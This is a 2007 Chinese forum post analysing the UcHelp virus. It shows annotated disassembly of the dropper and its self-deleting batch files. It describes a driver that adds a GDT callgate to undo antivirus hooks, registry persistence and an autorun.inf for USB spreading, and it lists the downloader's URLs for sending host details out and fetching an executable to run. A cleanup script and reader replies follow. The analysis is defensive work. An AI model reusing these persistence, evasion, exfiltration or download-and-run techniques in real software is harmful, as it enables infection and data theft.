004013FC |. FF15 44204000 CALL DWORD PTR DS:[<&KERNEL32.GetWi>; \GetWindowsDirectoryA
00401402 |. 68 B8214000 PUSH UcHelp.004021B8
; /\Downloaded Program Files\CxUSBKey.exe
00401407 |. 8D5424 0C LEA EDX,DWORD PTR SS:[ESP+C] ; |
0040140B |. 52 PUSH EDX ; |ConcatString
0040140C |. FF15 78204000 CALL DWORD PTR DS:[<&KERNEL32.lstrc>; \lstrcatA
00401412 |. 6A 00 PUSH 0 ; /FailIfExists = FALSE
00401414 |. 8D4424 0C LEA EAX,DWORD PTR SS:[ESP+C] ; |
00401418 |. 50 PUSH EAX ; |NewFileName
00401419 |. 8D8C24 900000>LEA ECX,DWORD PTR SS:[ESP+90] ; |
00401420 |. 51 PUSH ECX ; |ExistingFileName
00401421 |. FF15 40204000 CALL DWORD PTR DS:[<&KERNEL32.CopyF>; \CopyFileA
00401427 |. 5F POP EDI
; 将本程序拷贝至 C:\windows\Downloaded Program Files\CxUSBKey.exe
00401428 |. 8BE5 MOV ESP,EBP
0040142A |. 5D POP EBP
0040142B \. C3 RETN
=====================================================================
00401000 /$ 55 PUSH EBP
00401001 |. 8BEC MOV EBP,ESP
00401003 |. 83E4 F8 AND ESP,FFFFFFF8
00401006 |. 81EC 88020000 SUB ESP,288
0040100C |. 56 PUSH ESI
0040100D |. 57 PUSH EDI
0040100E |. 33C0 XOR EAX,EAX
00401010 |. C64424 10 00 MOV BYTE PTR SS:[ESP+10],0
00401015 |. B9 1F000000 MOV ECX,1F
0040101A |. 8D7C24 11 LEA EDI,DWORD PTR SS:[ESP+11]
0040101E |. F3:AB REP STOS DWORD PTR ES:[EDI]
00401020 |. 66:AB STOS WORD PTR ES:[EDI]
00401022 |. AA STOS BYTE PTR ES:[EDI]
00401023 |. 8D4424 10 LEA EAX,DWORD PTR SS:[ESP+10]
00401027 |. 50 PUSH EAX ; /Buffer
00401028 |. 68 80000000 PUSH 80 ; |BufSize = 80 (128.)
0040102D |. FF15 4C204000 CALL DWORD PTR DS:[<&KERNEL32.GetTe>; \GetTempPathA
00401033 |. 8B35 78204000 MOV ESI,DWORD PTR DS:[<&KERNEL32.ls>; kernel32.lstrcatA
00401039 |. 68 40214000 PUSH UcHelp.00402140 ; /ziptmp.bat
0040103E |. 8D4C24 14 LEA ECX,DWORD PTR SS:[ESP+14] ; |
00401042 |. 51 PUSH ECX ; |ConcatString
00401043 |. FFD6 CALL ESI ; \lstrcatA
00401045 |. 66:A1 3C21400>MOV AX,WORD PTR DS:[40213C]
0040104B |. 8B15 38214000 MOV EDX,DWORD PTR DS:[402138]
00401051 |. 66:898424 940>MOV WORD PTR SS:[ESP+94],AX
00401059 |. 899424 900000>MOV DWORD PTR SS:[ESP+90],EDX
00401060 |. 33C0 XOR EAX,EAX
00401062 |. B9 3E000000 MOV ECX,3E
00401067 |. 8DBC24 960000>LEA EDI,DWORD PTR SS:[ESP+96]
0040106E |. F3:AB REP STOS DWORD PTR ES:[EDI]
00401070 |. 68 00010000 PUSH 100 ; /BufSize = 100 (256.)
00401075 |. 8D8C24 940100>LEA ECX,DWORD PTR SS:[ESP+194] ; |
0040107C |. 51 PUSH ECX ; |PathBuffer
0040107D |. 6A 00 PUSH 0 ; |hModule = NULL
0040107F |. 66:AB STOS WORD PTR ES:[EDI] ; |
00401081 |. 66:C74424 14 >MOV WORD PTR SS:[ESP+14],22 ; |
00401088 |. FF15 7C204000 CALL DWORD PTR DS:[<&KERNEL32.GetMo>; \GetModuleFileNameA
0040108E |. 8D9424 900100>LEA EDX,DWORD PTR SS:[ESP+190]
00401095 |. 52 PUSH EDX ; /StringToAdd
00401096 |. 8D8424 940000>LEA EAX,DWORD PTR SS:[ESP+94] ; |
0040109D |. 50 PUSH EAX ; |ConcatString
0040109E |. FFD6 CALL ESI ; \lstrcatA
004010A0 |. 8D4C24 08 LEA ECX,DWORD PTR SS:[ESP+8]
004010A4 |. 51 PUSH ECX ; /StringToAdd
004010A5 |. 8D9424 940000>LEA EDX,DWORD PTR SS:[ESP+94] ; |
004010AC |. 52 PUSH EDX ; |ConcatString
004010AD |. FFD6 CALL ESI ; \lstrcatA
004010AF |. 68 2C214000 PUSH UcHelp.0040212C ; /\r\ndel %0
004010B4 |. 8D8424 940000>LEA EAX,DWORD PTR SS:[ESP+94] ; |
004010BB |. 50 PUSH EAX ; |ConcatString
004010BC |. FFD6 CALL ESI ; \lstrcatA
004010BE |. 6A 00 PUSH 0 ; /hTemplateFile = NULL
004010C0 |. 6A 00 PUSH 0 ; |Attributes = 0
004010C2 |. 6A 02 PUSH 2 ; |Mode = CREATE_ALWAYS
004010C4 |. 6A 00 PUSH 0 ; |pSecurity = NULL
004010C6 |. 6A 00 PUSH 0 ; |ShareMode = 0
004010C8 |. 68 00000040 PUSH 40000000 ; |Access = GENERIC_WRITE
004010CD |. 8D4C24 28 LEA ECX,DWORD PTR SS:[ESP+28] ; |
004010D1 |. 51 PUSH ECX ; |FileName
004010D2 |. FF15 80204000 CALL DWORD PTR DS:[<&KERNEL32.Creat>; \CreateFileA
004010D8 |. 8BF0 MOV ESI,EAX
004010DA |. 8D8424 900000>LEA EAX,DWORD PTR SS:[ESP+90]
004010E1 |. 8D50 01 LEA EDX,DWORD PTR DS:[EAX+1]
004010E4 |> 8A08 /MOV CL,BYTE PTR DS:[EAX]
004010E6 |. 40 |INC EAX
004010E7 |. 84C9 |TEST CL,CL
004010E9 |.^ 75 F9 \JNZ SHORT UcHelp.004010E4
004010EB |. 2BC2 SUB EAX,EDX
004010ED |. 6A 00 PUSH 0 ; /pOverlapped = NULL
004010EF |. 8D5424 10 LEA EDX,DWORD PTR SS:[ESP+10]; |
004010F3 |. 52 PUSH EDX ; |pBytesWritten
004010F4 |. 50 PUSH EAX ; |nBytesToWrite
004010F5 |. 8D8424 9C0000>LEA EAX,DWORD PTR SS:[ESP+9C] ; |
004010FC |. 50 PUSH EAX ; |Buffer
004010FD |. 56 PUSH ESI ; |hFile
004010FE |. FF15 84204000 CALL DWORD PTR DS:[<&KERNEL32.Write>; \WriteFile
00401104 |. 56 PUSH ESI ; /hObject
00401105 |. FF15 88204000 CALL DWORD PTR DS:[<&KERNEL32.Close>; \CloseHandle
0040110B |. 6A 14 PUSH 14 ; /Timeout = 20. ms
0040110D |. FF15 8C204000 CALL DWORD PTR DS:[<&KERNEL32.Sleep>; \Sleep
00401113 |. 6A 00 PUSH 0 ; /ShowState = SW_HIDE
00401115 |. 8D4C24 14 LEA ECX,DWORD PTR SS:[ESP+14] ; |
00401119 |. 51 PUSH ECX ; |CmdLine
0040111A |. FF15 94204000 CALL DWORD PTR DS:[<&KERNEL32.WinEx>; \WinExec
00401120 |. 5F POP EDI ;在临时文件夹创建ziptmp.bat
00401121 |. 5E POP ESI ; 写入，删除本程序的批处理
00401122 |. 8BE5 MOV ESP,EBP ; 并且运行
00401124 |. 5D POP EBP
00401125 \. C3 RETN
3.2 sysret.dat的分析
病毒主程序 UcHelp.exe 释放资源 ret 的 C:\sysret.dat
00401600 55 PUSH EBP
00401601 8BEC MOV EBP,ESP
00401603 83E4 F8 AND ESP,FFFFFFF8
00401606 81EC 08020000 SUB ESP,208
0040160C 56 PUSH ESI
0040160D 57 PUSH EDI
0040160E E8 DDFEFFFF CALL UnPacK_D.004014F0
; 释放资源 SYSRET 到 C:\sysret.sys，并加载到系统核心，向GDT添加一个callgate,以便R3的程序可以调用这个callgate来干一些只有R0才能干的事例如恢复杀毒软件或HIPS软件的SSDT HOOK
00401613 A1 74114000 MOV EAX,DWORD PTR DS:[401174]
00401618 66:8B0D 7811400>MOV CX,WORD PTR DS:[401178]
0040161F 894424 10 MOV DWORD PTR SS:[ESP+10],EAX
00401623 66:894C24 14 MOV WORD PTR SS:[ESP+14],CX
00401628 33C0 XOR EAX,EAX
0040162A B9 3E000000 MOV ECX,3E
0040162F 8D7C24 16 LEA EDI,DWORD PTR SS:[ESP+16]
00401633 F3:AB REP STOS DWORD PTR ES:[EDI]
00401635 68 00010000 PUSH 100
0040163A 8D9424 14010000 LEA EDX,DWORD PTR SS:[ESP+114]
00401641 52 PUSH EDX
00401642 6A 00 PUSH 0
00401644 66:AB STOS WORD PTR ES:[EDI]
00401646 66:C74424 14 22>MOV WORD PTR SS:[ESP+14],22
0040164D FF15 40104000 CALL DWORD PTR DS:[<&KERNEL32.GetModuleF>; kernel32.GetModuleFileNameA
00401653 8B35 3C104000 MOV ESI,DWORD PTR DS:[<&KERNEL32.lstrcat>; kernel32.lstrcatA
00401659 8D8424 10010000 LEA EAX,DWORD PTR SS:[ESP+110]
00401660 50 PUSH EAX
00401661 8D4C24 14 LEA ECX,DWORD PTR SS:[ESP+14]
00401665 51 PUSH ECX
00401666 FFD6 CALL ESI
00401668 8D5424 08 LEA EDX,DWORD PTR SS:[ESP+8]
0040166C 52 PUSH EDX
0040166D 8D4424 14 LEA EAX,DWORD PTR SS:[ESP+14]
00401671 50 PUSH EAX
00401672 FFD6 CALL ESI
00401674 68 68114000 PUSH UnPacK_D.00401168 ; ASCII "del %0"
00401679 8D4C24 14 LEA ECX,DWORD PTR SS:[ESP+14]
0040167D 51 PUSH ECX
0040167E FFD6 CALL ESI
00401680 6A 00 PUSH 0
00401682 6A 00 PUSH 0
00401684 6A 02 PUSH 2
00401686 6A 00 PUSH 0
00401688 6A 00 PUSH 0
0040168A 68 00000040 PUSH 40000000
0040168F 68 5C114000 PUSH UnPacK_D.0040115C ; ASCII "tempds.bat"
00401694 FF15 24104000 CALL DWORD PTR DS:[<&KERNEL32.CreateFile>; kernel32.CreateFileA
0040169A 8BF0 MOV ESI,EAX
0040169C 8D4424 10 LEA EAX,DWORD PTR SS:[ESP+10]
004016A0 8D50 01 LEA EDX,DWORD PTR DS:[EAX+1]
004016A3 8A08 MOV CL,BYTE PTR DS:[EAX]
004016A5 40 INC EAX
004016A6 84C9 TEST CL,CL
004016A8 ^ 75 F9 JNZ SHORT UnPacK_D.004016A3
004016AA 2BC2 SUB EAX,EDX
004016AC 6A 00 PUSH 0
004016AE 8D5424 10 LEA EDX,DWORD PTR SS:[ESP+10]
004016B2 52 PUSH EDX
004016B3 50 PUSH EAX
004016B4 8D4424 1C LEA EAX,DWORD PTR SS:[ESP+1C]
004016B8 50 PUSH EAX
004016B9 56 PUSH ESI
004016BA FF15 1C104000 CALL DWORD PTR DS:[<&KERNEL32.WriteFile>>; kernel32.WriteFile
004016C0 56 PUSH ESI
004016C1 FF15 18104000 CALL DWORD PTR DS:[<&KERNEL32.CloseHandl>; kernel32.CloseHandle
004016C7 6A 14 PUSH 14
004016C9 FF15 38104000 CALL DWORD PTR DS:[<&KERNEL32.Sleep>] ; kernel32.Sleep
004016CF 6A 00 PUSH 0
004016D1 68 5C114000 PUSH UnPacK_D.0040115C ; ASCII "tempds.bat"
004016D6 FF15 34104000 CALL DWORD PTR DS:[<&KERNEL32.WinExec>] ; kernel32.WinExec
004016DC 5F POP EDI ; 在本文件夹下面创建 tempds.bat
004016DD 5E POP ESI ; 写入删除本程序的批处理脚本
004016DE 8BE5 MOV ESP,EBP ; 运行 tempds.bat 咯
004016E0 5D POP EBP
004016E1 C2 1000 RETN 10
============================================
注意：
004015D5 /74 0D JE SHORT UnPacK_D.004015E4
004015D7 |68 80144000 PUSH UnPacK_D.00401480
004015DC |E8 CFFEFFFF CALL UnPacK_D.004014B0 ;这里是向GDT添加一个callgate,以便R3的程序可以调用这个callgate来获取R0权限，例如恢复杀毒软件或HIPS软件的SSDT HOOK
3.3 AceExt32.dll的分析
汇编代码略过，主要完成一下功能
1. 修改注册表
SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad
把 AceExt32.dll 加载到 Explorer.exe 进行中
ZipExt32.dll 也同上被加载到Explorer.exe 进行中
2. 修改注册表
写入{35CEC8A3-2BE6-11D2-8773-92E220524150}到 CLSD 关联 AceExt32.dll
3. AceExt32.dll 这个dll Hook了系统函数，还具有隐藏文件名为“autorun.inf”的文件并限制对该文件的读取和修改
4. 调用UnHelp.exe运行
5. 写文件
----------------------------------------------
创建文件夹
X:\RECYCLER\
----------------------------------------------
写入文件
X:\RECYCLER\UcHelp.exe
X:\RECYCLER\desktop.ini
X:\autorun.inf
X:\autorun.inf内容：
===========================
[AutoRun]
Shell=打开(&O)
shell\打开(&O)\command=RECYCLER\UcHelp.exe
X:\RECYCLER\desktop.ini内容：
===========================================
[.ShellClassInfo]
CLSID={645FF040-5081-101B-9F08-00AA002F954E}
===========================================
3.4 ulinshi32.exe的分析
00401700 /$ 55 PUSH EBP
00401701 |. 8BEC MOV EBP,ESP
00401703 |. 83E4 F8 AND ESP,FFFFFFF8
00401706 |. 81EC 04020000 SUB ESP,204
0040170C |. 53 PUSH EBX
0040170D |. 56 PUSH ESI
0040170E |. 57 PUSH EDI
0040170F |. 33C0 XOR EAX,EAX
00401711 |. C64424 10 00 MOV BYTE PTR SS:[ESP+10],0
00401716 |. 8B35 94204000 MOV ESI,DWORD PTR DS:[<&kernel32.GetWin>; kernel32.GetWindowsDirectoryA
0040171C |. B9 3F000000 MOV ECX,3F
00401721 |. 8D7C24 11 LEA EDI,DWORD PTR SS:[ESP+11]
00401725 |. F3:AB REP STOS DWORD PTR ES:[EDI]
00401727 |. 66:AB STOS WORD PTR ES:[EDI]
00401729 |. AA STOS BYTE PTR ES:[EDI]
0040172A |. 33C0 XOR EAX,EAX
0040172C |. C68424 100100>MOV BYTE PTR SS:[ESP+110],0
00401734 |. B9 3F000000 MOV ECX,3F
00401739 |. 8DBC24 110100>LEA EDI,DWORD PTR SS:[ESP+111]
00401740 |. F3:AB REP STOS DWORD PTR ES:[EDI]
00401742 |. 66:AB STOS WORD PTR ES:[EDI]
00401744 |. AA STOS BYTE PTR ES:[EDI]
00401745 |. 68 00010000 PUSH 100 ; /BufSize = 100 (256.)
0040174A |. 8D4424 14 LEA EAX,DWORD PTR SS:[ESP+14]; |
0040174E |. 50 PUSH EAX ; |Buffer
0040174F |. FFD6 CALL ESI ; \GetWindowsDirectoryA
00401751 |. 8B3D 34204000 MOV EDI,DWORD PTR DS:[<&kernel32.lstrca>; kernel32.lstrcatA
00401757 |. 68 78214000 PUSH UnPack_D.00402178
; /String2 = "\Downloaded Program Files\ZipExt32.dll"
0040175C |. 8D4C24 14 LEA ECX,DWORD PTR SS:[ESP+14 ; |
00401760 |. 51 PUSH ECX ; |String1
00401761 |. FFD7 CALL EDI ; \lstrcat
00401763 |. 68 00010000 PUSH 100 ; /BufSize = 100 (256.)
00401768 |. 8D9424 140100>LEA EDX,DWORD PTR SS:[ESP+114]; |
0040176F |. 52 PUSH EDX ; |Buffer
00401770 |. FFD6 CALL ESI ; \GetWindowsDirectoryA
00401772 |. 68 10234000 PUSH UnPack_D.00402310 ; /String2 = "\Downloaded Program Files\Ext32.dat"
00401777 |. 8D8424 140100>LEA EAX,DWORD PTR SS:[ESP+114] ; |
0040177E |. 50 PUSH EAX ; |String1
0040177F |. FFD7 CALL EDI ; \lstrcat
00401781 |. 8D8C24 100100>LEA ECX,DWORD PTR SS:[ESP+110]
00401788 |. 51 PUSH ECX ; /FileName
00401789 |. FF15 68204000 CALL DWORD PTR DS:[<&kernel32.DeleteFil>; \DeleteFileA
0040178F |. 8D9424 100100>LEA EDX,DWORD PTR SS:[ESP+110]
; 删除 C:\windows\Downloaded Program Files\Ext32.dat
00401796 |. 52 PUSH EDX ; /NewName
00401797 |. 8D4424 14 LEA EAX,DWORD PTR SS:[ESP+14]
; |C:\windows\Downloaded Program Files\ZipExt32.dll 改名 C:\windows\Downloaded Program Files\Ext32.dll
0040179B |. 50 PUSH EAX ; |ExistingName
0040179C |. FF15 70204000 CALL DWORD PTR DS:[<&kernel32.MoveFileA>; \MoveFileA
004017A2 |. E8 89FCFFFF CALL UnPack_D.00401430
; 先。删除以前生成的相关dll，再释放资源 ceo 到C:\windows\Downloaded Program Files\ZipExt32.dll
004017A7 |. E8 84FEFFFF CALL UnPack_D.00401630
; 释放资源 hiv 到 c:\tmp.hiv,执行完他的任务，去死
004017AC |. 8B1D 18204000 MOV EBX,DWORD PTR DS:[<&advapi32.RegCre>; advapi32.RegCreateKeyA
004017B2 |. 8D4C24 0C LEA ECX,DWORD PTR SS:[ESP+C]
004017B6 |. 51 PUSH ECX ; /pHandle
004017B7 |. 68 E0224000 PUSH UnPack_D.004022E0
; |Subkey = "CLSID\{35CEC8A3-2BE6-11D2-8773-92E220524140}"
004017BC |. 68 00000080 PUSH 80000000 ; |hKey = HKEY_CLASSES_ROOT
004017C1 |. FFD3 CALL EBX ; \RegCreateKeyA
004017C3 |. 8B35 6C204000 MOV ESI,DWORD PTR DS:[<&kernel32.lstrle>
; 建立 CLSID\{35CEC8A3-2BE6-11D2-8773-92E220524140}
004017C9 |. 68 D4224000 PUSH UnPack_D.004022D4 ; /String = "ZipExt32"
004017CE |. FFD6 CALL ESI ; \lstrlenA
004017D0 |. 8B5424 0C MOV EDX,DWORD PTR SS:[ESP+C]
004017D4 |. 8B3D 14204000 MOV EDI,DWORD PTR DS:[<&advapi32.RegSet>; advapi32.RegSetValueExA
004017DA |. 50 PUSH EAX ; /BufSize
004017DB |. 68 D4224000 PUSH UnPack_D.004022D4 ; |Buffer = UnPack_D.004022D4
004017E0 |. 6A 01 PUSH 1 ; |ValueType = REG_SZ
004017E2 |. 6A 00 PUSH 0 ; |Reserved = 0
004017E4 |. 68 D0224000 PUSH UnPack_D.004022D0 ; |ValueName = ""
004017E9 |. 52 PUSH EDX ; |hKey
004017EA |. FFD7 CALL EDI ; \RegSetValueExA
004017EC |. 8B4424 0C MOV EAX,DWORD PTR SS:[ESP+C]
004017F0 |. 50 PUSH EAX ; /hKey
004017F1 |. FF15 10204000 CALL DWORD PTR DS:[<&advapi32.RegCloseK>; \RegCloseKey
004017F7 |. 8D4C24 0C LEA ECX,DWORD PTR SS:[ESP+C]
004017FB |. 51 PUSH ECX ; /pHandle
004017FC |. 68 94224000 PUSH UnPack_D.00402294
; |Subkey = "CLSID\{35CEC8A3-2BE6-11D2-8773-92E220524140}\InprocServer32"
00401801 |. 68 00000080 PUSH 80000000 ; |hKey = HKEY_CLASSES_ROOT
00401806 |. FFD3 CALL EBX ; \RegCreateKeyA
00401808 |. 8D5424 10 LEA EDX,DWORD PTR SS:[ESP+10]
; 以下是建立 CLSID\{35CEC8A3-2BE6-11D2-8773-92E220524140}等与之关联项目
0040180C |. 52 PUSH EDX ; /String
0040180D |. FFD6 CALL ESI ; \lstrlenA
0040180F |. 8B4C24 0C MOV ECX,DWORD PTR SS:[ESP+C]
00401813 |. 50 PUSH EAX ; /BufSize
00401814 |. 8D4424 14 LEA EAX,DWORD PTR SS:[ESP+14]; |
00401818 |. 50 PUSH EAX ; |Buffer
00401819 |. 6A 01 PUSH 1 ; |ValueType = REG_SZ
0040181B |. 6A 00 PUSH 0 ; |Reserved = 0
0040181D |. 68 D0224000 PUSH UnPack_D.004022D0 ; |ValueName = ""
00401822 |. 51 PUSH ECX ; |hKey
00401823 |. FFD7 CALL EDI ; \RegSetValueExA
00401825 |. 68 8C224000 PUSH UnPack_D.0040228C ; /String = "Both"
0040182A |. FFD6 CALL ESI ; \lstrlenA
0040182C |. 8B5424 0C MOV EDX,DWORD PTR SS:[ESP+C]
00401830 |. 50 PUSH EAX ; /BufSize
00401831 |. 68 8C224000 PUSH UnPack_D.0040228C ; |Buffer = UnPack_D.0040228C
00401836 |. 6A 01 PUSH 1 ; |ValueType = REG_SZ
00401838 |. 6A 00 PUSH 0 ; |Reserved = 0
0040183A |. 68 7C224000 PUSH UnPack_D.0040227C ; |ValueName = "ThreadingModel"
0040183F |. 52 PUSH EDX ; |hKey
00401840 |. FFD7 CALL EDI ; \RegSetValueExA
00401842 |. 8B4424 0C MOV EAX,DWORD PTR SS:[ESP+C]
00401846 |. 50 PUSH EAX ; /hKey
00401847 |. FF15 10204000 CALL DWORD PTR DS:[<&advapi32.RegCloseK>; \RegCloseKey
0040184D |. E8 AEF7FFFF CALL UnPack_D.00401000 ; 检测是否有 avp.exe
00401852 |. 84C0 TEST AL,AL
00401854 |. 74 2E JE SHORT UnPack_D.00401884
00401856 |. 8B4D 08 MOV ECX,DWORD PTR SS:[EBP+8]
00401859 |. 6A 05 PUSH 5 ; /ShowState = SW_SHOW
0040185B |. 6A 00 PUSH 0 ; |/lParam = 0
0040185D |. 68 F0134000 PUSH UnPack_D.004013F0; ||pDlgProc = UnPack_D.004013F0
00401862 |. 6A 00 PUSH 0 ; ||hOwner = NULL
00401864 |. 6A 6C PUSH 6C ; ||pTemplate = 6C
00401866 |. 51 PUSH ECX ; ||hInst
00401867 |. FF15 E0204000 CALL DWORD PTR DS:[<&user32.CreateDialo>; |\CreateDialogParamA
0040186D |. 50 PUSH EAX ; |hWnd
0040186E |. FF15 E4204000 CALL DWORD PTR DS:[<&user32.ShowWindow>>; \ShowWindow
00401874 |. E8 F7F7FFFF CALL UnPack_D.00401070
; 又要利用 sysret.dat向GDT添加一个callgate,以便R3的程序可以调用这个callgate来干一些只有R0才能干的事例如恢复杀毒软件或HIPS软件的SSDT HOOK
00401879 |. 68 E8030000 PUSH 3E8 ; /Timeout = 1000. ms
0040187E |. FF15 2C204000 CALL DWORD PTR DS:[<&kernel32.Sleep>] ; \Sleep
00401884 |> E8 97F9FFFF CALL UnPack_D.00401220 ; 加载zipext32.dll到Explorer
00401889 |. E8 62F8FFFF CALL UnPack_D.004010F0
; 在临时文件夹里面船舰 7ztmp.bat ,写入删除该程序的批处理，并运行
0040188E |. 5F POP EDI ; ntdll.7C930738
0040188F |. 5E POP ESI
00401890 |. 33C0 XOR EAX,EAX
00401892 |. 5B POP EBX
00401893 |. 8BE5 MOV ESP,EBP
00401895 |. 5D POP EBP
00401896 \. C2 1000 RETN 10
======================================================================
00401000 /$ 81EC 28010000 SUB ESP,128
00401006 |. 56 PUSH ESI
00401007 |. 57 PUSH EDI
00401008 |. 6A 00 PUSH 0 ; /ProcessID = 0
0040100A |. 6A 02 PUSH 2 ; |Flags = TH32CS_SNAPPROCESS
0040100C |. E8 95080000 CALL <JMP.&kernel32.CreateToolhelp32S>; \CreateToolhelp32Snapshot
00401011 |. 8BF8 MOV EDI,EAX ; 建立系统进程列表句柄
00401013 |. 8D4424 08 LEA EAX,DWORD PTR SS:[ESP+8]
00401017 |. 50 PUSH EAX ; /pProcessentry
00401018 |. 57 PUSH EDI ; |hSnapshot
00401019 |. C74424 10 280>MOV DWORD PTR SS:[ESP+10],128 ; |
00401021 |. E8 7A080000 CALL <JMP.&kernel32.Process32First> ;\Process32First
00401026 |. 85C0 TEST EAX,EAX ;枚举进程
00401028 |. 74 28 JE SHORT UnPack_D.00401052
0040102A |. 8B35 A4204000 MOV ESI,DWORD PTR DS:[<&msvcrt._strcm>; msvcrt._stricmp
00401030 |> 8D4C24 2C /LEA ECX,DWORD PTR SS:[ESP+2C]
00401034 |. 68 1C214000 |PUSH UnPack_D.0040211C ; ASCII "avp.exe"
00401039 |. 51 |PUSH ECX
0040103A |. FFD6 |CALL ESI
0040103C |. 83C4 08 |ADD ESP,8
0040103F |. 85C0 |TEST EAX,EAX
00401041 |. 74 1A |JE SHORT UnPack_D.0040105D
00401043 |. 8D5424 08 |LEA EDX,DWORD PTR SS:[ESP+8]
00401047 |. 52 |PUSH EDX ; /pProcessentry
00401048 |. 57 |PUSH EDI ; |hSnapshot
00401049 |. E8 4C080000 |CALL <JMP.&kernel32.Process32Next> ; \Process32Next
0040104E |. 85C0 |TEST EAX,EAX
00401050 |.^ 75 DE \JNZ SHORT UnPack_D.00401030
00401052 |> 5F POP EDI ; 列举进程
00401053 |. 32C0 XOR AL,AL
00401055 |. 5E POP ESI
00401056 |. 81C4 28010000 ADD ESP,128
0040105C |. C3 RETN
0040105D |> 5F POP EDI
0040105E |. B0 01 MOV AL,1
00401060 |. 5E POP ESI
00401061 |. 81C4 28010000 ADD ESP,128
00401067 \. C3 RETN
3.5 ZipExt32.dll的分析
这个dll 类似于木马下载者，汇编代码略
工作流程：
1. 下载 http://www.black163.com/mm/cfg2.txt 到 C:\z.ini
--从这个名字来看，应该是配置文件
2. 发送本地主机信息到网络服务器
http://www.black163.com/mm/dg1/log.asp?isnew=1&LocalInfo=%s&szHostName=%s&tmp3=tmp3
http://www.black163.com/mm/dg1/log.asp?isnew=0&LocalInfo=%s&szHostName=%s&tmp3=tmp3
LocalInfo=本地信息
zHostName=主机名字
将本地及其参数发到网上去
3. 下载网络程序
http://www.black163.com/u319.exe
http://mm.black163.com/u319.exe
下载 u319.exe 并运行~
--可能是类似木马升级吧，使用完下载好的程序后删除该文件.
4. 运行以下程序（网络下载下来的程序改名后的程序）
wsctny1.exe
wsctny2.exe
wsctny1.tmp
4. 伪装成 Alex数字签名Alexander Roshal
第四章附录
清除病毒一般的方法是，关闭病毒进程，修复病毒关联，清除病毒程序，修复感染文件。下面我们就对 UcHelp 病毒进行手动清除病毒。
4.1 UcHelp病毒清除脚本
@Rem 将下面的代码复制下面的句子到记事本，然后保存为“任意文件名.bat”，再双击运行即可清除病毒。
Title UcHelp 病毒专杀脚本 1.070601 Write By Cater QQ:24882688
color 0a
cls
@echo ***********************************
@echo * UcHelp 病毒专杀脚本 1.070601 *
@echo * 说明： *
@echo * 本程式自动关闭和清理UcHelp*
@echo * 病毒相关文件！ *
@echo * Make By Cater 江海 [一品堂] *
@echo * QQ:24882688 2007年06月01日 *
@echo ***********************************
@echo.
@echo 按任意键开始执行病毒清理程式
@echo.
@pause
@Rem 关闭 Explorer 进程
taskkill /im explorer.exe /f
@Rem 强制删除系统中的病毒文件
del /q /f "C:\tmp.hiv"
del /q /f "C:\sysret.dat"
del /q /f "C:\sysret.sys"
del /q /f "c:\windows\system32\AceExt32.dll"
del /q /f "c:\windows\Downloaded Program Files\Ext32.dat"
del /q /f "c:\windows\Downloaded Program Files\Ext32.dll"
del /q /f "c:\windows\Downloaded Program Files\CxUSBKey.exe"
del /q /f"c:\windows\Downloaded Program Files\ZipExt32.dll"
@Rem 删除注册表中被病毒修改的键值
reg delete HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad /v ZipExt32 /f
reg delete HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad /v AceExt32 /f
reg delete HKEY_CLASSES_ROOT\CLSID\{35CEC8A3-2BE6-11D2-8773-92E220524140} /f
reg delete HKEY_CLASSES_ROOT\CLSID\{35CEC8A3-2BE6-11D2-8773-92E220524150} /f
reg delete HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\SM_GameDro /f
@Rem 删除其他逻辑分区里面的AutoRun.inf 以及相应病毒文件
for %%a in (c,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z) do for %%d in (%%a:\RECYCLER\UcHelp.exe,%%a:\RECYCLER\desktop.ini,%%a:\autorun.inf) do del /q /f %%d
@Rem 恢复资源管理器进程
Start Explorer
@Echo 脚本执行完毕，按任意键退出。
这个脚本我已经编译好了，双击以下图标即可下载我编译好的批处理脚本。
4.2 病毒预防措施
通过对这个病毒程序的分析我们清晰的看到病毒程序传播以及执行的过程。
第一步：激活病毒程序
方式一：人为点击或运行病毒程序
方式二：利用系统漏洞自行的让系统下载并执行病毒程序
移动存储Autorun 病毒就是利用系统对AutoRun.ini文件读取里面的运行参数的。
第二步：复制病毒并传播
任何一款病毒都具有复制与传播特性，网页木马(网页收割者)，邮件病毒(MSN病毒邮件)，以及威金和熊猫烧香
第三步：隐藏保护自己
比如这里的 UcHelp 病毒就是利用SSDT HOOK 对病毒文件进行隐藏。有的病毒程序利用多进程进行对自己的保护，还有的就是利用系统文件名进行伪装和欺骗。
综合以上的环节我们看到，对于病毒的预防我们应该作到以下两点
1. 注意可执行程序的是否安全，下载文件的时候我们也应该去一些信任度高的站点
2. 及时打补丁，访问信任度高的站点，并适量控制系统对自动播放功能的使用
如果病毒程序已经执行了，移动存储中已经携带病毒了，我们应该注意对这些移动存储的使用进行控制，防止病毒传播。
基本解决方法：关闭病毒进程，修复病毒关联，清除病毒程序，修复感染文件。
参考资料
360安全卫士 MJ0011 对sysret.sys 功能的补充
xyzreg
利用RestoreKey修改注册表的方式饶过部分主动防御软件及杀毒软件对修改注册表监控
驱动开发网上对驱动文件调试的文摘
DebugMan 论坛上面对驱动程序的逆向分析的文章

复制代码

senots · 发表于 2007-12-1 17:04:47

不错的文章。学习下！膜拜下！！
顺便问下LZ，分析病毒从OD载入就开始F8分析么？

[ 本帖最后由 senots 于 2007-12-1 17:05 编辑 ]

透明的云 · 发表于 2007-12-1 18:05:03

不错的文章，不过现在比较菜，。/:014

xzqd · 发表于 2007-12-2 13:18:05

不错的文章学习了........

柳韵荷风 · 发表于 2007-12-2 16:34:20

太深奥了，留着以后慢慢学。

cater · 发表于 2007-12-6 13:25:30

有时需要动态分析的
不过静态的比较多

玩病毒分析最好安装 Vmware，动态跟踪生动点

嘿嘿，sys 驱动的静态分析学习中.........
IDA 好强大，学习中

凤凰火影 · 发表于 2007-12-6 20:48:15

非常深奥，很多都涉及底层的运作机制。只能慢慢消化了。

dying · 发表于 2007-12-16 05:33:38

深澳~~/:010 /:010

推动学会 · 发表于 2007-12-23 19:55:42

谢谢楼主分享。。。。。。支持！

查理德 · 发表于 2007-12-25 15:49:08

有几个病毒样本？

		自动登录	找回密码
密码			加入我们

[原创] UcHelp 病毒分析

回复 2# 的帖子